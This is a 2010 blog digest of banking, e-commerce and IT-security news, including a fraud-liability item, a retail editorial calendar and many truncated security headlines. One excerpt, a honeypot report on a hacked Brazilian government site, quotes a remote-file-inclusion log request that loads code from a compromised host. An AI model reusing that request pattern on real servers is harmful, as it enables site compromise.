Saturday, April 10, 2010

Should Banks Cover Fraud Losses?

E-News
Week of April 5, 2010

The Week in Review from BankInfoSecurity.com

Weekly digest of the week’s top news and views. And don’t miss our new audio week-in-review podcast by Editorial Director Tom Field! Hear the highlights of the week’s biggest stories.

Featured News

Should Banks Cover Fraud Losses?

Vendor Pushes for New Protections for Commercial Accounts

In the wake of lawsuits over "reasonable security," business and bank advocates are at odds over whether federal regulations should be amended to enhance commercial protection.

MasterCard Announces Three Year Agreement with Next Jump, Inc.

PYMNTS.com talks about MasterCard's partnership with Next Jump, Inc.

MasterCard Worldwide today announced a three-year exclusive alliance in the payments space with Next Jump, Inc., a next-generation e-commerce company, to revolutionize the online shopping experience.

The strategic agreement will allow the companies to work together to harness their combined assets in the payments technology, e-commerce and digital marketing space to drive innovation for the industry and improve the consumer experience. It will also give MasterCard access to Next Jump's extensive aggregated e-commerce network, human capital through its digital technology engineers, and an agile development process to fuel innovation and drive speed to market for relevant and desirable e-commerce solutions that meet consumer demands.

Joshua Peirez, Group Head of Innovative Platforms, MasterCard Worldwide and Charlie Kim, Founder and CEO of Next Jump discuss the exclusive alliance to revolutionize the consumer e-commerce experience.

Internet Retailer Top 500 - The Big get Bigger...

Topics and Categories Covered
2010 Top 500 Preview
Web Site Design
Mobile Commerce
Fulfillment
Social Marketing
Multichannel Strategy
Rich Media
Executive Compensation
Search Engine Optimization
Store Systems
Cross-channel Marketing
Supply Chain Technology

June 2010 Cover story:

The 2010 Internet Retailer Top 500—the big get bigger


The results are in and they show the largest online retailers took market share during recession-wracked year 2009. The Top 500 online retailers sold nearly 11% more last year, while e-commerce as a whole grew only about 2%. Even without Amazon, the leading e-retailers outpaced the market. That's just one of many insights in this summary of data from the Internet Retailer Top 500 Guide, the most authoritative ranking of e-retailing. This much-anticipated feature highlights the top performers among web-only retailers, retail chains, consumer goods manufacturers and catalogers. This special section also profiles the best of the best, and provides insights into the secrets of their success.

Mobile commerce: How Top 500 retailers are selling via mobile

Twice as many Top 500 retailers are selling to consumers via their mobile phones this year as a year ago. This story examines their strategies, the features of their mobile sites and apps, and where they're finding mobile expertise. And it will report on how the m-commerce team fits into the org chart.

Social marketing: The elusive ROI of social media

Marketing on social networks is an inexpensive way to reach millions of consumers. But do they want to be reached on Facebook and Twitter? This story will examine the costs in staff time and technology, and weigh them against the benefits retailers have realized from their social marketing initiatives.

Rich media: Mining the riches of rich media

Consumers want to see products in every detail, and making that possible remains one of the biggest challenges for online retailers. As a result, rich media is among the biggest areas of investment by e-commerce technology providers. This story will look at the latest advances in rich media and report on how consumers respond to them—and whether they're worth the investment.


Search engine optimization: Five tips for moving up in Google search results

Google is constantly changing how it displays search results and modifying its ranking rules—without letting marketers in on its secrets. This story will report on some of the latest changes to provide five tips for winning on Google.


Cross-channel marketing: Finding useful information in oceans of data

With each new consumer touchpoint more data accumulates—and the challenge of getting a single view of the consumer becomes more complex. This story will look at the latest technology advances, how retailers are using them, and the benefits they realize from having a complete view of their customers' behavior.

E-commerce developments: How the top women in e-retailing made it to the top

This story will draw on an exclusive Internet Retailer survey of women in e-commerce to document their experiences, the obstacles they've faced and their tactics for getting ahead. It will also profile women leaders and highlight their advice for younger women. It will also look at how the pay of women e-retail executives compares to that of their male counterparts.


Web site design: What does it cost to redesign a retail web site?

This story will report on the experiences of retailers that have redesigned their web sites in-house and those that have used outside firms to explain how to cost out a redesign. It will include the considerable time that retailer personnel will have to spend on the project, even if an outside firm is doing much of the design work, and will highlight key pitfalls to avoid.

Fulfillment: Want to offer free shipping? Plan out fulfillment now

This story will examine how retailers plan ahead so they can make shipping offers without cutting too deeply into margins. It will provide tips on negotiating deals with carriers, technologies that optimize shipping methods, and how sharing plans with carriers can help keep costs down.


Multichannel strategy: The once-lowly store locator becomes a selling tool

As more consumers research on the web before shopping in stores, more of them visit the store locator page to find addresses, maps, phone numbers and hours. Recognizing that those web pages get a lot of visits, some retailers are spiffing them up. This story will examine what retail chains gain from turning store locator pages into marketing tools, and what it costs to keep information up to date and respond to customer queries.

E-commerce developments: Money talks – what executives' paychecks say about online commerce

This exclusive Internet Retailer survey of the compensation of e-retail executives will show how retailers value their e-commerce leaders. Based on an analysis of the annual compensation reports of publicly traded retailers, this story ranks the highest-paid execs, shows how they fared in the tumultuous year just past and analyzes what these figures show about the place of e-commerce in major retail organizations.

Mobile commerce: QVC's mobile trifecta

TV and the web have been the sales channels for QVC, and mobile is now the third. The home shopping retailer has gone mobile with gusto, and is among the few retailers that let consumers shop via a mobile site, a mobile app and by responding to text messages. This story provides a mobile leader's take on the technology required and the marketing and merchandising lessons it's drawn.

Executive profile: The one-woman encyclopedia of e-commerce technology

Halley Silver is a popular speaker at e-commerce conferences because of her broad knowledge of e-commerce technology, and her engaging way of explaining technical matters to non-technical managers. This story will look at how she learned so much, how she keeps up, and how it helps her do her job better.

Web site design: Why show consumers your competitors' prices?

Such major e-commerce players as Amazon, Buy.com and Overstock show site visitors what competitors are charging. Does this tactic promote conversion and customer loyalty? Or do customers leave for other sites offering lower prices? This story will provide the answer, based on the experiences of top e-retailers.

Corporate strategies: Web-only Shoplet.com takes on the office supply giants

The big office supply chains—Staples, Office Depot and OfficeMax—have invested heavily in the web to serve their mostly small business customers. But they still have to offset the costs of their stores. Shoplet.com seeks to take market share by leveraging the lower cost of a web-only operation. This profile will examine Shoplet's claim that it can operate more cheaply than stores—and highlight the lessons other e-retailers can learn from this fast-growing company.

Store systems: Do consumers want to shop the web from stores?

Many retail chains are betting they do, introducing more web-enabled kiosks to extend store selection. This story will dig into how much consumers order online from stores, what other benefits retailers gain from in-store devices, the cost of deploying them and training employees to use them, and whether this is a real trend or a desperate move by stores to withstand online competition.

E-commerce developments: Making sense of the conflicting estimates of e-retail's growth

Several organizations estimate the growth of online retailing, but they never quite agree, which raises questions about whose numbers to trust. This story will delve into how each organization comes up with their estimates and report on how online retailers reconcile these numbers in order to plan for the coming years.

Supply chain: Putting visibility to suppliers to work to improve profits

The Internet ties together the retail supply chain, from manufacturer through the SKU on a store shelf or in a warehouse. But all this data has to be put to work in an intelligent way. This story looks at the latest supply chain technology that helps turn data into useful information and, most importantly, profit.

Advertising Material Deadlines
Space Close: May 7, 2010
Materials Due: May 14, 2010


Internet (Lack of) Security News through 4/10

This Free IT-Security news feed is provided by E-Secure-IT, the most comprehensive and complete Business Risk Management Intelligence Service and IT-Security Risk and Threat Early Warning Service available in the market today. Visit us at www.e-secure-it.com or email more-info@e-secure-it.com for more information on our available services.

Managing the aftermath of a loss of personal data
(from amberhawk at 10-4-2010)
If readers want to examine an interesting example of how to manage a data loss, have a look at what happened at the London Borough of Barnet (see references). A data loss involving 9,000 children followed a burglary of the home of a member of staff. The loss included the Council’s computer equipment (a laptop), CD Roms and memory sticks along with other items from the house. Like most organisations, the Council had implemented procedures and policies to ensure that the personal data on the co...

When Security Measures Don't Catch Anyone
(from voltage at 10-4-2010)
Suppose you implement a security measure. Maybe it's a home alarm, maybe it's a security checkpoint before entering a building, it might even be putting tighter login requirements to a network. In IT, fake security would work even less effectively. Someone might not pay for email encryption, but still say, "You can't read this email, it's encrypted." It would take very little effort to see that the statement is false. How about someone announcing that they have just implemented new measures t...

Who Discovers More Corporate Fraud: Whistleblowers, Regulators, or Journalists?
(from Project On Government Oversight at 10-4-2010)
A new study in the Journal of Finance offers a friendly reminder of the key role whistleblowers play in rooting out fraud, waste and abuse, finding that corporate fraud is more likely to be detected by an employee from within a firm, rather than external auditors, government regulators, self-regulatory organizations, or the media. The study examined a total of 216 cases of alleged corporate fraud. Employees, i.e. whistleblowers, were responsible for revealing the fraud in 17 percent of cases...

Murdoch hacks grumble over outsourced IT failures
(from The Register at 10-4-2010)
To picturesque Wapping, where unrest among hacks and techies about recent IT cuts at News International is bubbling following a 24-hour email outage yesterday that crippled newsrooms and commercial operations alike. Cast in the role of villain is CIO Andrew Hickey, the man responsible for a broad IT outsourcing deal in December that has seen many functions taken over by HCL, of Noida, near New Delhi....

Getting Inside the Mind of a Hacker
(from Wall Street Journal at 10-4-2010)
When it was discovered earlier this year that hackers in Europe and China had successfully broken into computers at close to 2,500 companies and government agencies around the globe, Derek Manky was on the job, helping to minimize damage and coordinate a defense. "In a nutshell, my job is fighting cyber crime," says Mr. Manky who works in cyber security and threat research for Fortinet Inc., a computer network security company. For a lot of people, cyber security management is an unfamiliar j...

China routing snafu briefly mangles interweb
(from The Register at 10-4-2010)
Bad routing information sourced from China has disrupted the internet for the second time in a fortnight. Global BGP (Border Gateway Routing) lookup tables sucked in data from a small ISP called IDC China Telecommunication, apparently accidentally broadcast by state-owned carrier China Telecommunications, IDG reports. ISPs including AT&T, France Telecom, Level3, Deutsche Telekom, Qwest and Telefonica accepted ill-thought out traffic routes as a result of the incident....

Conservatives outline £12bn public sector savings plan
(from BBC at 10-4-2010)
The Tories have detailed how public spending could be cut by £12bn to fund their pledge on National Insurance. Tory leader David Cameron said cuts to IT projects, office costs, contracts and recruitment were "do-able". Labour has dismissed the savings, some of which the Tories would use to curb a planned NI rise, as a "fantasy". Labour and the Liberal Democrats say the savings would mean public sector job cuts while the Tories say an NI rise is a "jobs killer" for firms. But Conservative advis...

What’s new and improving about IT today?
(from The Register at 10-4-2010)
For anyone who has been in IT for a while, all that new and improved stuff can quite quickly feel like the same-old-same-old, repackaged for the latest generation of supposedly tech-literate masses. Still, the “I’ve seen it all before” game can be a dangerous one to play. It is too easy (for example) to look at social media and relate it back to USENET newsgroups, or compare the current generation of mobile devices with Psion organisers. Good as all of these things were, they were different –...

Another email threat
(from TelegraphIndia at 10-4-2010)
Even before the police could crack the source of the email threat sent to chief minister Naveen Pattnaik on March 27, his office received yet another email last night threatening a repeat of the Dantewada massacre in Orissa, if the joint operation against Maoists was not stopped. The email, like the previous one, has been sent from the id plga.ocac.in and takes responsibility for the death of 11 policemen in Sunday’s blast at Koraput. It has threatened to invade the official website of the st...

Cyber-Spin: How the Internet Gets Framed as Dangerous
(from circleID at 10-4-2010)
At the beginning of this year, a set of powerhouse organizations in cybersecurity (CSO Magazine, Deloitte, Carnegie Mellon's CERT program, and the U.S. Secret Service) released the results of a survey of 523 business and government executives, professionals and consultants in the ICT management field. The reaction generated by this survey provides an unusually clear illustration of how cyber-security discourse has become willfully detached from facts. There is an organized industrial and poli...

Internet filter according to Yes Minister
(from ZDNet at 10-4-2010)
In the realm of internet filtering, we can see the Politician's Syllogism quite plainly: internet is full of naughty. A filter can stop naughty. Therefore we must filter the internet. Now the issue here is that people who know the internet know that a filter is unworkable. However, this is based on the assumption that knowledgeable internet people are the target audience. This is, of course, incorrect. The audience is made up of a group of people who: 1. are afraid of the internet and/or ...

Wikifounder reports Wikiparent to FBI over 'child pxxx'
(from The Register at 10-4-2010)
Wikipedia co-founder Larry Sanger has reported the site's parent organization to the Federal Bureau of Investigation, saying he believes the Wikimedia Commons "may be knowingly distributing child pxxxography." Earlier this week, Sanger disclosed his FBI report with a post to a public mailing list and later an open letter to a member of the Wikimedia Foundation's board of trustees. In the letter, he also says he notified his Senators and Congressional representatives over the images in questio...

Indian outsourcers emphasize cosmetic security measures, Forrester warns
(from Computer World at 10-4-2010)
Companies who send software development work to India need to ensure that their vendors take holistic measures to protect data and aren't simply "checking the box" on security issues, Forrester Research warned this week. Many Indian companies have bolstered their security controls and business continuity measures in recent years, Forrester said in a report. But the lack of executive support for security efforts, an over-reliance on technology controls and inadequate training and awareness und...

Ikea gift card scam takes in nearly 40,000 Facebook users
(from Network World at 10-4-2010)
A scam Facebook page offering the site's users a $1,000 Ikea gift card took in nearly 40,000 victims Friday. It's the latest example of a new and pernicious trend on the social-networking site as scammers, usually disreputable online marketers trying to earn revenue by generating Web traffic, have flooded Facebook with these fake gift card pages over the past months. In late March, a similar $1,000 Ikea gift card scam took in more than 70,000 victims, and just last week another scam Facebook...

US: al-Qaida exemplifies new-age nuclear threat
(from FOXNews at 10-4-2010)
The White House on Friday warned that al-Qaida is quietly hunting for an atomic bomb, adding urgency to a historic summit next week where President Barack Obama will try to persuade world leaders to step up efforts to keep nuclear weapons out of terrorist hands. Expectations for decisive action by the 47 countries are low, because existing controls haven't worked as well as hoped and some nations worry tighter regulation will only slow civilian nuclear power projects. But the White House h...

Browsers shouldn't carry the can for poor security
(from ZDNet at 10-4-2010)
Last month, Microsoft started offering Windows users a choice of 12 browsers, as part of a deal with the European Commission. Microsoft's browser-ballot screen has exposed millions of users to a choice that in many cases they may not have even been aware they were able to make. The ballot pop-up in Windows presents users with a randomised list of the five most popular applications for browsing the web — Internet Explorer, Mozilla Firefox, Safari, Opera, Google Chrome — plus seven others less ...

Security Guru Richard Clarke Talks Cyberwar
(from Forbes at 10-4-2010)
Richard Clarke, the antiterrorism czar under Bill Clinton, George H.W. Bush and George W. Bush, knows something about spotting national security threats in the making: In 2001 he repeatedly warned the Bush administration about the threat of al Qaeda in the months and weeks leading up to the Sept. 11 attacks--and was ignored. Nine years later his national security concerns have shifted to the cyber realm, as he's laid out in detail in a new book, Cyber War: The Next Threat to National Security...

Arkansas Mom Charged After 'Hacking' Son's Facebook Account
(from EWeek at 10-4-2010)
An Arkansas mother has been charged with harassment for accessing her 16-year-old son’s Facebook account and posting messages. The mother, Denise New of Arkadelphia, was hit with the misdemeanor charge March 26, after her son, Lane, filed a complaint with the Clark County Prosecutor's Office. According to reports, the younger New accused his mom of hacking into his Facebook account, changing his e-mail and Facebook passwords and posting slanderous Facebook messages about his private life....

HNNCast for the first week of April 2010
(from Security Tube at 9-4-2010)
HNNCast for the first week of April 2010
Lead Stories * Heartland a Harvest of Chronic Chaos, Yahoo! 2nd to Google at Everything, Symantec Speaks on China Crackers, The Lightzz- the Soundzz- the Rhythmzz- the Noizze, 0day What a Feeling!- Adobe
News * CalTech OPFOR, Honeynet Forensic Challenge- Round 3, Cross Days Ahead for t00n-pr0n pir8s, Gettin Keykeriki wit It
Quickies * Nmap 5.030BETA1, Prisoners Phreak-Out, Quip Users Irked re:Privacy, Student/Teacher Con-frence, NSF Gran...

 Big Changes for the Security Bloggers Network 
 (from ashimmy at 9-4-2010) 
 We have almost 300 member blogs in the SBN feed. Virtually all of the security commentary fit to print. It probably represents the biggest collection of security content in the world. I have some other great ideas that I want to put into the SBN site. Tips and tricks for better blogging. Getting the security blogging industry blogging again. Perhaps tying in a twitter stream and security tweeters (have to speak to the security twits). ... read more» 
   
 





 Q&A: Cyber warfare 
 (from Net-Security at 9-4-2010) 
 There have been various incidents that could be described as acts of cyber warfare. The cyber-attacks against Estonian systems starting in April 2006 with data-flooding attacks on key government websites, culminating in coordinated Distributed Denial of Service (DDoS) attacks on key government, financial and media sites in May 2006, certainly would fall under this category.... read more» 
   
 





 Trojan-driven keylogger attacks are on the rise 
 (from SecurityPark at 9-4-2010) 
 Visa has issued an alert to its transaction processing members and their clients - retailers of all sizes - that trojan-driven keylogger incidents are on the rise. According to Trusteer, the rising number of keylogger attacks on retailers' till terminals is due to the fact that many units are Windows-driven and therefore susceptible to the same type of malware infections as office and home PCs. "Trojan-driven keylogger attacks have been on the rise for home and office PC users for some time, ... read more» 
   
 





 Credit card dumping on the rise 
 (from viewfromthebunker at 9-4-2010) 
 At Symantec we’ve noted a worrying increase in so-called “credit card dumps” on offer in the criminal underworld over the past year. Dumps, which are copies of the information stored on the magnetic stripe of the original card, are usually obtained via electronic “skimming devices” fitted to the credit card machine or bank teller. The devices often take the form of an additional card reader that is placed over the original and records any data that passes through it. Skimming devices can b... read more» 
   
 





 EU data laws force e-Borders' compromise 
 (from ZDNet at 9-4-2010) 
 Data protection laws in other European countries will decide whether the UK Border Agency receives information on those travelling to Britain. A report from Parliament's Home Affairs Select Committee reveals that the European Commission has told the UK Border Agency (UKBA) it will not be able to refuse entry to EU citizens and their family members whose passenger data is not available to the £1.2bn e-Borders system. In addition, transport providers will be instructed not to deny boarding ... read more» 
   
 





 Cyber attack cripples Free Malaysia Today 
 (from hostexploit at 9-4-2010) 
 A massive cyber attack on the Free Malaysia Today web site over the past week has disrupted operations and left readers without access to news articles on the site. Legal action is now being contemplated against the Malaysian website and the hosting company from which the attacks came. Free Malaysia Today management said: "We have identified the attackers and traced the attacks as coming through a popular Malaysian cyber forum based on servers located in Kuala Lumpur.... read more» 
   
 





 Once a rising tech star in Seattle, now a federal prisoner 
 (from hostexploit at 9-4-2010) 
 What does a USD30,000 gold watch cost? How about two of them? If federal prosecutors prove correct in their assertions, a pair of watches could cost a Seattle businessman -- accused of fraud -- decades of hard time. That much was clear from the charges filed in U.S. District Court late last month against Mark Phillips, a 35-year-old tech executive facing two counts of wire fraud.... read more» 
   
 





 UK Bill Targets Internet File Sharing, Jeopardizes Open WiFi 
 (from Wired at 9-4-2010) 
 An unpopular plan to tax British fixed-line phone users to help roll-out a high-speed broadband network and other controversial proposals have been dropped in the final push to get the Digital Economy bill passed into law. Parliament’s lower house passed the overall bill late Wednesday night despite protests from some members, after certain elements were stripped out in the final negotiations. The most high profile aspect of the proposed legislation — to disconnect or slow down the Web acc... read more» 
   
 





 Kyrgyzstan has its revolution but no cyber warfare – why? 
 (from intelfusion at 9-4-2010) 
 The country of Kyrgyzstan is in the midst of a revolution as former President Kurmanbek Bakiyev is in hiding and its Prime Minister and the rest of the Kyrgyzstan government have resigned. The interim government is headed by Roza Otunbaeva and a 13 member cabinet; two of whom met with former PM Daniar Usenov to secure his resignation yesterday according to this report by Radio Free Europe.... read more» 
   
 





 German minister of consumer protection criticises Facebook's proposed third party sharing policy, as the site moves to clarify its plans 
 (from scmagazineuk at 9-4-2010) 
 The German federal minister of consumer protection Ilse Aigner has written an open letter to Facebook CEO Mark Zuckerberg criticising recent changes to data protection regulations on the website. Published on the Spiegel online website, Aigner claimed that she was ‘astonished' to discover that the social networking site was relaxing data protection regulations on the network even further despite the concerns of users and severe criticism from consumer activists.... read more» 
   
 





 Cloud computing risks outweigh benefits, survey finds 
 (from TechTarget at 9-4-2010) 
 A new survey is finding a continued level of angst among IT professionals administering cloud computing projects within their organizations. The survey of more than 1,800 U.S.-based IT professionals found that 48% said Software as a Service (SaaS) and cloud computing risks outweigh the benefits. By contrast, 55% said the risks are either appropriately balanced or are outweighed by the benefits. The survey was conducted by Rolling Meadows, Ill.-based Information Systems Audit and Control Assoc... read more» 
   
 





 Private sector key to thwarting 'Google-style' cyber attacks 
 (from IT Business at 9-4-2010) 
 White House Cybersecurity Coordinator Howard Schmidt says the information security community is right to be spooked by massive, coordinated attacks that recently targeted Google. But he rejects the notion that this is cybergeddon, and believes the best defense remains in the hands of the private sector. "You guys have been carrying the water," Schmidt told attendees at CSO Perspectives 2010 Tuesday. The government can do a lot to improve the nation's cyber defenses. But ultimately, he said, t... read more» 
   
 





 Illegal downloaders face life net ban 
 (from townsvillebulletin at 9-4-2010) 
 Claims Google will be blocked, Wikileaks shut down and pirates banned for life under new UK law. Sky News reported the Digital Economy Bill aims to stop people from illegally downloading copyrighted material from the internet, but critics argue it could have far greater powers and be used to censor and block free speech by ruling politicians. The bill was rushed through the legislature before the dissolution of Parliament next Monday, ahead of next month's national election. It was pass... read more» 
   
 





 Facebook boycott called over privacy concerns 
 (from ComputerWorldUk at 9-4-2010) 
 A German consumer group has warned users not to use Facebook if the social-networking company fails to withdraw the proposed changes to its privacy policy. Last month, Facebook announced that it was considering changing its privacy policy to allow information to be passed on to third parties without users giving their consent. VZBV, an umbrella organisation representing consumer groups across Germany, has said that the American company has "repeatedly and deliberately crossed data protection ... read more» 
   
 





 Cyber security tips for external affairs ministry officials 
 (from Netindia123 at 9-4-2010) 
 An e-mail is not just a digital message, it is a potential spying instrument - this, and other lessons are being drilled into the minds of officials of ministry of external affairs (MEA) through a series of internal workshops that started last month. It was in late 2008 that the attacks against the MEA's computer network were first detected - most of them were tracked to Chengdu in China, which led to an overhaul of the hardware and the establishment of a unified threat management system, wit... read more» 
   
 





 Data Breaches Cost Australian Companies AUS$1.97 Million 
 (from hostexploit at 9-4-2010) 
 Australian organizations experience costly data breaches with the average organizational cost of a data breach, including activities intended to prevent a loss of customer or consumer trust, at AUS$1.97 million and the average cost per compromised record at AUS$123. The most expensive data breach cost one organization surveyed more than AUS$4 million to resolve, according to the 2009 Annual Study: “Australian Cost of a Data Breach” report − the first of its kind to quantify the costs a... read more» 
   
 





 Twitter among tools used by hackers; Cda vulnerable with no policy: report 
 (from squamishchief at 9-4-2010) 
 Ottawa must take urgent action on cyberspace security, or risk falling victim to targeted attacks by hackers using social media such as Twitter to glean secret government or corporate information, Canadian researchers said Tuesday. The team of researchers from the University of Toronto and Ottawa-based SecDev Group released a report Tuesday documenting a complex cyber espionage system of Chinese hackers. Twitter and email were among the tools used to access highly sensitive documents from ... read more» 
   
 





 New vacancies at ENISA 
 (from Enisa at 9-4-2010) 
 I would like to inform you that the following two vacancy notices have been published at ENISA's website: ENISA-TA-AD-2010-04: Expert in Security and Resilience of Communication Networks - Deadline 03/05/2010 ENISA-CA-III-2010-03: Security and Resilience of Communication Networks Officer - Deadline 03/05/2010 The deadline of the SNE (National Experts Seconded to ENISA) vacancy Ref. ENISA-SNE-2010-01 has been extended until 12th April 2010. ... read more» 
   
 





 IG: DOJ, FBI have lost sight of identity theft priorities 
 (from fierce governmentit at 9-4-2010) 
 Identity theft is a major threat to millions of Americans but a new inspector general audit of the Justice Department worries efforts against it are falling by the wayside. In 2008, identity theft was the fastest growing crime, claiming 10 million victims, according to recent estimates by the Justice Department's Criminal Division. Fighting it became a high priority after President George W. Bush signed a May 2006 executive order creating the President's Identity Theft Task Force, but since ... read more» 
   
 





 How To Nail An Interview (20 Tips) 
 (from howtonailaninterview at 9-4-2010) 
 What is it that certain people say or do while interviewing that makes them stand out? Why do some people struggle to find work, while others land a job in no time? I wanted to know, and the only way to find out was to experience the interview from the other side of the table. If I could be the one asking the interview questions, not answering, I could see first hand what made candidates stand out. I could then take that knowledge and cater my behavior in any future job interview to give myself ... read more» 
   
 





 London Underground line hit by IT failure 
 (from IT Pro at 9-4-2010) 
 London’s transport network took a massive hit yesterday after an IT error left travellers without the use of the Circle Line for several hours. The underground line was closed for the entire morning rush after computers used to control signals, dating back to the 1980s, were found to have burnt out. Although some of the line was up and running again quickly, many parts remained suspended for the rest of the day. Delays were still troubling commuters this morning on the line, with suspensions ... read more» 
   
 





 ISAlliance Expresses Tentative Support for Cyber Legislation 
 (from infosecisland at 9-4-2010) 
 On Wednesday, March 24, the Senate Commerce Committee became the first Congressional Committee to approve a comprehensive cybersecurity bill. The "kill-switch" provision (turning off the Internet) and federally mandated technical standards on the private sector have been eliminated from earlier versions of the legislation and the bill now embraces private sector standards and market incentives. The bill still needs additional changes before industry can support floor action, but many of th... read more» 
   
 





 New Regulations Will Not Prepare the US for Cyberwar 
 (from infosecisland at 9-4-2010) 
 Senators Rockefeller and Snowe have formulated a new Cybersecurity bill that they describe in today’s Wall Street Journal. (Use Google news to get to the full article.) The Bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the US for cyberwar. Regulations have been tried before. One of the main drivers for investments in IT security have been regulations. California 1386 required the disclosure of data losses that... read more» 
   
 





 2009 Annual Study: Australian Cost of a Data Breach 
 (from Ponemon Institute at 9-4-2010) 
 PGP Corporation and the Ponemon Institute are pleased to report the results of our first annual study concerning the cost of data breach incidents for Australian companies. Ponemon Institute research indicates that data breaches continue to have serious financial consequences on organisations.... read more» 
   
 





 German anti-Facebook backlash gathers speed 
 (from The Sydney Morning Herald at 9-4-2010) 
 Anti-Facebook feelings in Germany grew Wednesday as a major consumer group urged people to abandon the social networking website unless it scraps planned changes to its privacy policy. "If protection of your personal data is important to you, we can only advise users to oppose the planned changes, and together with their friends to choose another operator," said the Federation of German Consumer Organisations (VZBZ), an umbrella group for 42 German consumer associations.... read more» 
   
 





 Survey: Many Federal IT Pros Skeptical of U.S. Security Readiness 
 (from EWeek at 9-4-2010) 
 The majority of federal IT decision makers in the national defense and security department agencies aren't expecting many changes from the newly named cyber-security coordinator. That's according to a survey of 201 IT pros commissioned by Lumension. The survey, conducted last month by Clarus Research Group, found that more than half "expect only minor policy changes" as a result of the creation of the cyber-security coordinator position. In addition, a full 74 percent view the possibility of ... read more» 
   
 





 South Windsor Student Charged With Hacking School Network 
 (from Courant at 9-4-2010) 
 A South Windsor High School student is accused of hacking into the school's administrative files. Ahmad Abouakar, 18, of 23 Wapping Ave., was arrested Wednesday. He was charged with unauthorized computer use and fifth-degree e-Crime. Abouakar was released after posting $2,500 bail and is due in Superior Court in Manchester on April 15.... read more» 
   
 





 Identity Thieves Filed For $4 Million in Tax Refunds Using Names of Living and Dead 
 (from Wired at 9-4-2010) 
 A group of sophisticated identity thieves managed to steal more than $4 million by filing bogus tax returns using the names and Social Security numbers of other people, many of them deceased, according to a 74-count indictment unsealed in Arizona Thursday. The thieves operated their scheme for at least three years from January 2005 to April 2008, allegedly filing more than 1,900 fraudulent tax returns involving about $4 million in refunds directed to more than 170 bank accounts. The conspirat... read more» 
   
 





 ACMA launches anti-SMS spam hotline 
 (from Computer World at 9-4-2010) 
 The Australian Communications and Media Authority (ACMA) has soft launched an anti-SMS spam hotline. The hotline allows consumers receiving spam SMS to send the offending message directly to a mobile number run by ACMA, rather than through an online form. A source within ACMA said the hotline (0429 999 888) had not yet been officially launched and was currently being trialled among staff and people who regularly complain about SMS spam.... read more» 
   
 





 Exorbitant costs for .brand domain names 
 (from The Age - Australia at 9-4-2010) 
 Australian companies wanting to snare an internet address that incorporates their brand can expect to pay hundreds of thousands of dollars when the process kicks off next year, shutting the door on all but the largest brands. Companies interested in applying for a global top-level domain name, or gTLD, to complement or replace the current .com or .net appendages will have to pay a $202,000 non-refundable fee to the body that oversees domain names. Some call it a cash grab by the Internet Corpo... read more» 
   
 





 Police attack Facebook in dispute over child safety 
 (from Times Online at 9-4-2010) 
 Police have accused Facebook of being arrogant for failing to install a child safety button on its web pages. The social networking site is said to have never reported a case to British police of a suspected paedophile attempting to groom a child. The Child Exploitation and Online Protection Centre (CEOP) has received 252 complaints about possible illegal activity on Facebook in the first three months of this year. None came from Facebook. More than 40 per cent have been about attempted groom... read more» 
   
 





 'Virtual sit-in' tests line between DDoS and free speech 
 (from The Register at 9-4-2010) 
 A University of California professor who organized a "virtual sit-in" that targeted the university president's website has been told he may face criminal charges for mounting a distributed denial of service attack. UC San Diego Professor Ricardo Dominguez spearheaded the March 4 digital protest by calling on demonstrators to visit a webpage that sent a new page request to the UC president's website every one to six seconds. A separate function automatically sent 404 queries to the server. A "... read more» 
   
 





 Matrix actor site stages defacement spat 
 (from The Register at 9-4-2010) 
 Rival hackers are duking it out on the site of Matrix actor Harry Lennix. Lennix, who played Commander Lock in the second two films of the Matrix trilogy and more recently played Boyd in Joss Whedon's Dollhouse, maintains the site harrylennix.com. The site was defaced last week, and just a few days later was sprayed with digital graffiti by another rascal. The second hacker posted claims that the first (SnazzyG) had bought access to the compromised site without actually doing any hacking.... read more» 
   
 





 Spam a Judge, Go To Jail? 
 (from Wired at 9-4-2010) 
 A litigant in a civil lawsuit asked an appeals court Wednesday to overturn his 30-day contempt sentence for urging people to send e-mail to a federal judge. Lots of e-mail. The brouhaha began in February, when TV pitchman Kevin Trudeau urged his radio and web followers to deluge U.S. District Judge Robert Gettleman with e-mail so he would side with him in a civil lawsuit pending before the Chicago judge.... read more» 
   
 





 Brazilian government site hacked 
 (from sucuri at 9-4-2010) 
 Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br. We started to see RFI requests trying to use a file placed inside their "portal" directory: a.185.231.103 - - - "GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0" After examining it we can see again traces of the famous RFI bot scanner: $... read more» 
   
 





 From Cyber War: The Next Threat to National Security and What to Do About It 
 (from NetworkWorld at 9-4-2010) 
 Cyber war is not some victimless, clean, new kind of war that we should embrace. Nor is it some kind of secret weapon that we need to keep hidden from the daylight and from the public. For it is the public, the civilian population of the United States and the privately owned corporations that own and run our key national systems, that are likely to suffer in a cyber war. The entire phenomenon is shrouded in such government secrecy that it makes the Cold War look like a time of openness and tr... read more» 
   
 





 Google mobile services back up in China 
 (from v3 at 9-4-2010) 
 Google's mobile services are back up and running in China after being partially blocked following its move to servers in Hong Kong. The search firm's status report for its services in mainland China was updated yesterday to show that its mobile services are back in action or subject only to minor blocking.... read more» 
   
 





 Wiseguys face the music for trying to play it smart in online ticketing 
 (from washingtonpost at 9-4-2010) 
 In the increasingly sophisticated world of ticket brokering, the Wiseguys have grabbed attention. Whether they are crooked or merely clever will be up to a jury. Federal investigators charge that a ring of hackers working for Wiseguy Tickets Inc. cracked security measures at Ticketmaster and other major vendors. They gained control of 1.5 million tickets to popular and coveted concerts and sporting events nationwide between 2002 and 2009.... read more» 
   
 





 A Chinese ISP momentarily hijacks the Internet (again) 
 (from Computer World at 9-4-2010) 
 For the second time in two weeks, bad networking information spreading from China has disrupted the Internet. On Thursday morning, bad routing data from a small Chinese ISP called IDC China Telecommunication was re-transmitted by China's state-owned China Telecommunications, and then spread around the Internet, affecting Internet service providers such as AT&T, Level3, Deutsche Telekom, Qwest Communications and Telefonica.... read more» 
   
 





 North Korean Red Star operating system details emerge 
 (from BBC at 9-4-2010) 
 Details of a home-grown computer operating system developed by North Korea have emerged. Information about Red Star, as it is known, was made public by a Russian blogger studying in North Korea, who bought the program off the street. Further analysis by a government institute in neighbouring South Korea said the operating system is aimed at monitoring user activity.... read more» 
   
 





 Sick of ‘Cyber’ 
 (from cato-at-liberty at 9-4-2010) 
